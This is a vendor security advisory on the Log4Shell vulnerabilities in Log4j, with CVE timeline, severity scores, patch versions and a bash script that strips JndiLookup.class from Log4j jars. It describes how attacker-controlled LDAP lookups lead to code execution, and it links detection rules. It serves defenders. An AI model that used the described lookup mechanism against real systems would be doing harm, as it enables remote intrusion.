UPDATED: Log4j Critical Vulnerability Scores a 10/10 For How Bad It Is (So Act Fast)

 

Note: Automox does not use Log4j. There is no known impact to Automox’s products or services as a result of this vulnerability.

We've compiled a timeline of the latest Log4j news for easy reference here.


Update (12/18/2021) Yet another Log4j vulnerability was discovered, this time with version 2.16.0, the release that patched CVE-2021-44228 and CVE-2021-45046. The vulnerability (CVE-2021-45105) allows for infinite recursion in lookup evaluation, which a threat actor could utilize to cause a denial of service attack.

The National Institute of Standards and Technology (NIST) has yet to score the vulnerability, though Apache scores it as a 7.5, so it is severe. Apache released version 2.17.0 to patch the newest vulnerability. If you are unable to patch immediately, which we recommend, our Worklet below will still temporarily remediate all three of the Log4j vulnerabilities discussed (CVE-2021-44228, CVE-2021-45046, and CVE-2021-45105) until you are able to patch the vulnerable systems.


UPDATE (12/17/21): On December 6, version 2.15.0 was released to address CVE-2021-44228, the now infamous 10/10 CVSS remote code execution (RCE) vulnerability in Log4Shell. Shortly after, CVE-2021-45046 was discovered in version 2.15.0, with a CVSS of 3.7. Version 2.16.0 was released on December 13 to address the new vulnerability.


However, on December 17 a researcher discovered a new bypass to allow full RCE once again, which resulted in a CVSS increase from 3.7 to 9.0. If you only upgraded to version 2.15.0, you are not protected from possible RCE, upgrade to 2.16.0 immediately. Visit the Apache website for additional information.


Log4Shell is a zero-day unauthenticated Remote Code Execution (RCE) vulnerability in Log4j versions 2.0-beta9 up to 2.14.1 identified as CVE-2021-44228. Log4Shell scores a perfect 10.0 on CVSS, the maximum possible criticality for a vulnerability. The vulnerability was demonstrated with a proof of concept exploit published to GitHub, and threat actors are already searching for the vulnerability.

Apache stated that in Log4j versions 2.14.1 and earlier, "JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.”

Exploitation allows full system control on target Apache systems. Apache has quickly released Log4j 2.16.0 to address the vulnerability. In 2.16.0, the log messages behavior is disabled by default. The flaw can also be mitigated by reverting to earlier versions of Log4j (see non-patch remediation instructions below).

Log4j: Action required

Yara rules are available to detect exploitation attempts: https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b

These rules will allow organizations to quickly identify exploitation attempts targeting CVE-2021-44228. Early indicators show mass scanning activities happening by adversaries to identify vulnerable targets.

This zero-day can be mitigated in previous releases (2.10 and later) by setting system property "log4j2.formatMsgNoLookups" to "true" or removing the JndiLookup class from the classpath on impacted systems.

Automox Worklet for Log4j

Automox customers can also use a Worklet as a temporary fix for CVE-2021-44228 until the impacted systems can be patched and fully remediated.

Evaluation Code:
#!/bin/bash
#================================================================
# HEADER
#================================================================
#% SYNOPSIS
#+  This worklet is a temporary fix for CVE-2021-44228, or the
#%  Log4j vulnerability in formatMsgNoLookups.
#% DESCRIPTION
#%  This worklet is a temporary fix for CVE-2021-44228, or the
#%  Log4j vulnerability in formatMsgNoLookups.
#% USAGE
#%    ./evaluation.sh
#%
#% EXAMPLES
#%  ./evaluation.sh
#%
#================================================================
#- IMPLEMENTATION
#-    version         WF-548-Log4j_temporary_fix (www.automox.com) 1.0
#-    author          Michael King
#-
#================================================================
#  HISTORY
#     12/10/2021 : Michael King : Script creation
#     ##/##/#### : ####: Validated and catalogued
#
#================================================================
# END_OF_HEADER
#================================================================
exit 1

Remediation Code:
#!/bin/bash
#================================================================
# HEADER
#================================================================
#% SYNOPSIS
#+ This worklet is a temporary fix for CVE-2021-44228, or the
#% Log4j vulnerability in formatMsgNoLookups.
#% DESCRIPTION
#% This worklet is a temporary fix for CVE-2021-44228, or the
#% Log4j vulnerability in formatMsgNoLookups.
#% USAGE
#% ./remediation.sh
#%
#% EXAMPLES
#% ./remediation.sh
#%
#================================================================
#- IMPLEMENTATION
#- version WF-548-Log4j_temporary_fix (www.automox.com) 1.1
#- author Michael King
#-
#================================================================
# HISTORY
# 12/10/2021 : Michael King : Script creation
# 12/17/2021 : Validated and catalogued
#
#================================================================
# END_OF_HEADER
#================================================================
# Ideally, upgrading to a current version of log4j2 is the best
# fix for this vulnerability. However, if that is not currently
# an option this may work as a temporary fix. If using this
# temporary fix, please be aware of SDLC pipeline and how changes
# here may be overwritten by your existing workflow.
#################################################################
# WARNING: Setting the option below will attempt to remove
# JndiLookup.class from the log4j-core-*.jar file, which may
# break code in production.  Make sure to thoroughly evaluate
# and test this fix before attempting it.
# After the change is made a full restart of the environment is
# recommended to ensure the change is live.
# Example: in our test environment this path was
# /usr/local/apache-log4j-2.15.0-bin
# log4jpath=/usr/local/apache-log4j-2.15.0-bin
if [ -n "$log4jpath" ]; then
if zip -q -d "$log4jpath"/log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class &> /dev/null; then
echo "Successfully removed JndiLookup.class.  " 2>&1
else
echo "failed to remove JndiLookup.class.  " 2>&1
fi
fi

This Worklet follows the recommendations from RedHat for remediation. Additional details can be found here.

Log4j remediation recommendation

Log4Shell is a CVSS 10.0 vulnerability. Organizations using the Log4j library are advised to upgrade to the latest release immediately, seeing that attackers are already searching for exploitable targets.


Automox for Easy IT Operations

Automox is the cloud-native IT operations platform for modern organizations. It makes it easy to keep every endpoint automatically configured, patched, and secured – anywhere in the world. With the push of a button, IT admins can fix critical vulnerabilities faster, slash cost and complexity, and win back hours in their day. 

Grab your free trial of Automox and join thousands of companies transforming IT operations into a strategic business driver.

Dive deeper into this topic

loading...